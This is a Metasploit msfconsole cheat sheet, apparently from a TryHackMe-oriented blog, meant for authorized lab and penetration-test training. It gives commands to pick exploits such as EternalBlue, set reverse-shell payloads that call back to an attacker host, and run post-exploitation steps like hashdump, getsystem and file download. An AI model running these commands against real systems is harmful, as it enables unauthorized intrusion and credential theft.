Metasploit msfconsole Cheat Sheet

Overview

This cheat sheet provides a quick reference for commonly used Metasploit Framework and msfconsole commands.

Use these commands only in authorized labs, penetration tests, and systems you have permission to assess.


Start Metasploit

Launch the Metasploit console:

msfconsole

Start without displaying the banner:

msfconsole -q

Display command-line options:

msfconsole -h

Basic Console Commands

Display available commands:

help

Display information about a specific command:

help search

Clear the console:

clear

Exit Metasploit:

exit

Return to the previous menu:

back

Search for Modules

Search by service or keyword:

search smb
search apache
search ftp

Search by CVE:

search cve:2021-44228

Search for exploit modules:

search type:exploit

Search for auxiliary modules:

search type:auxiliary

Search by platform:

search platform:windows

Search using multiple filters:

search type:exploit platform:linux

Select a Module

Load a module by its full name:

use exploit/windows/smb/ms17_010_eternalblue

Load a module by its search result number:

use 0

Display the currently selected module:

show options

Return to the main console:

back

View Module Information

Display detailed information about the selected module:

info

Display information without loading the module:

info exploit/windows/smb/ms17_010_eternalblue

Display required and optional settings:

show options

Display advanced settings:

show advanced

Display compatible payloads:

show payloads

Display supported targets:

show targets

Display available actions:

show actions

Configure the Target

Set a single target:

set RHOSTS <TARGET_IP>

Example:

set RHOSTS 10.10.10.10

Set multiple targets:

set RHOSTS 10.10.10.10,10.10.10.11

Set a target range:

set RHOSTS 10.10.10.10-20

Set a CIDR network:

set RHOSTS 192.168.1.0/24

Set the target service port:

set RPORT <PORT>

Example:

set RPORT 445

Configure the Callback

Set the local callback address using an interface:

set LHOST tun0

Set the callback address using an IP address:

set LHOST <ATTACKER_IP>

Example:

set LHOST 10.8.0.5

Set the callback port:

set LPORT 4444

On TryHackMe, LHOST is commonly set to the VPN interface or the IP address assigned to that interface.


View Network Interfaces

Exit to a local shell temporarily:

shell

View Linux interfaces:

ip addr

Return to Metasploit:

exit

You can also run a local command without leaving msfconsole:

ip addr

Some local commands may need to be prefixed with:

! ip addr

Configure Payloads

Display compatible payloads:

show payloads

Select a Windows Meterpreter reverse shell:

set payload windows/x64/meterpreter/reverse_tcp

Select a Linux Meterpreter reverse shell:

set payload linux/x64/meterpreter/reverse_tcp

Select a standard Linux reverse shell:

set payload linux/x64/shell_reverse_tcp

Display payload options:

show options

Remove the selected payload:

unset payload

Set and Unset Options

Set an option:

set OPTION VALUE

Example:

set RPORT 445

Display a configured option:

get RHOSTS

Remove an option:

unset RHOSTS

Remove all configured options:

unset all

Global Options

Set an option globally:

setg LHOST tun0

Set a global target:

setg RHOSTS <TARGET_IP>

View global settings:

getg

Remove a global setting:

unsetg LHOST

Remove all global settings:

unsetg all

Global options remain available when switching between modules.


Validate the Configuration

Review configured options:

show options

Check whether the module supports the target:

check

Some modules do not support the check command.


Run a Module

Run the selected module:

run

Run an exploit:

exploit

Run the exploit as a background job:

exploit -j

Run without automatically interacting with the session:

exploit -z

Run as a background job without automatically opening the session:

exploit -j -z

Manage Sessions

List active sessions:

sessions

Display detailed session information:

sessions -v

Interact with session 1:

sessions -i 1

Rename a session:

sessions -n web-server -i 1

Background the current session:

background

You can also background a Meterpreter session with:

Ctrl+Z

Kill a specific session:

sessions -k 1

Kill all sessions:

sessions -K

Run a command across all sessions:

sessions -C <COMMAND>

Manage Jobs

List background jobs:

jobs

Display detailed job information:

jobs -v

Stop a specific job:

jobs -k 0

Stop all jobs:

jobs -K

Meterpreter System Information

Display Meterpreter help:

help

Display system information:

sysinfo

Display the current user:

getuid

Display the process ID:

getpid

Display network interfaces:

ipconfig

Display the routing table:

route

Meterpreter File Commands

Display the current directory:

pwd

List files:

ls

Change directories:

cd <DIRECTORY>

Read a text file:

cat <FILE>

Download a file:

download <REMOTE_FILE>

Upload a file:

upload <LOCAL_FILE>

Create a directory:

mkdir <DIRECTORY>

Delete a file:

rm <FILE>

Search for a file:

search -f <FILENAME>

Example:

search -f *.txt

Meterpreter Process Commands

List running processes:

ps

Display the current process ID:

getpid

Migrate into another process:

migrate <PID>

Execute a process:

execute -f <PROGRAM>

Example:

execute -f cmd.exe

Meterpreter Shell Access

Open a system shell:

shell

Return from the system shell to Meterpreter:

exit

Background Meterpreter:

background

Meterpreter Privilege Commands

Attempt to elevate privileges:

getsystem

Check the current user:

getuid

Display Windows privileges:

getprivs

Dump password hashes when authorized and supported:

hashdump

Commands such as getsystem and hashdump depend on the session type, operating system, privileges, and security controls present on the target.


Post-Exploitation Modules

Background the active session:

background

Search for post-exploitation modules:

search type:post

Load a post-exploitation module:

use post/<MODULE_PATH>

Display module options:

show options

Set the session:

set SESSION 1

Run the module:

run

Auxiliary Scanner Workflow

Search for a scanner:

search type:auxiliary scanner smb

Select the module:

use auxiliary/scanner/smb/smb_version

Set the target:

set RHOSTS <TARGET_IP>

Review options:

show options

Run the scanner:

run

Workspaces

List workspaces:

workspace

Create a workspace:

workspace -a <WORKSPACE_NAME>

Example:

workspace -a TryHackMe

Switch workspaces:

workspace TryHackMe

Delete a workspace:

workspace -d TryHackMe

Rename a workspace:

workspace -r TryHackMe THM-Labs

Metasploit Database Commands

Check database status:

db_status

Display discovered hosts:

hosts

Display discovered services:

services

Display stored credentials:

creds

Display collected loot:

loot

Display notes:

notes

Import Nmap Results

Run Nmap from Metasploit and store the results:

db_nmap -sC -sV <TARGET_IP>

Import an existing Nmap XML file:

db_import scan.xml

Display imported hosts:

hosts

Display imported services:

services

Save Commands to a Resource Script

Create a resource file:

nano setup.rc

Example contents:

use exploit/<MODULE_PATH>
set RHOSTS <TARGET_IP>
set LHOST tun0
set LPORT 4444
show options

Run the resource script:

msfconsole -r setup.rc

Run it from inside msfconsole:

resource setup.rc

Typical Exploit Workflow

search <SERVICE_OR_VULNERABILITY>
info <MODULE>
use <MODULE>
show options
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST tun0
show payloads
set payload <PAYLOAD>
check
run
sessions
sessions -i 1

Common Mistakes

  • Setting LHOST to the target IP instead of the attack machine’s IP
  • Using the wrong VPN interface
  • Forgetting to configure RHOSTS
  • Selecting a payload that is incompatible with the target
  • Running an exploit before reviewing info
  • Skipping service and version enumeration
  • Assuming every module supports check
  • Forgetting that reverse payloads require the target to connect back
  • Leaving global options configured from a previous lab
  • Using Metasploit against systems without authorization

Quick Troubleshooting

Review all settings:

show options

Verify the callback interface:

! ip addr

Check the selected payload:

show payloads

Display the current target:

get RHOSTS

Display the callback address:

get LHOST

Remove an incorrect global setting:

unsetg LHOST

List active listeners and jobs:

jobs

List active sessions:

sessions

Key Takeaways

  • Use search, info, and show options before running a module.
  • RHOSTS identifies the target.
  • LHOST identifies the attack machine’s callback address.
  • show payloads displays payloads compatible with the selected module.
  • Use check when supported before attempting exploitation.
  • Use sessions to manage shells and Meterpreter sessions.
  • Use workspaces to keep lab and assessment data organized.
  • Always perform accurate enumeration before selecting an exploit.

Similar Posts

  • TryHackMe: Jump

    Jump is a Red Team-focused TryHackMe room that demonstrates how small trust relationships between users and automation can be chained together to achieve full system compromise. Rather than relying on a single vulnerability, the room requires moving through multiple privilege boundaries by abusing insecure automation and misconfigurations. The room begins with anonymous access to an…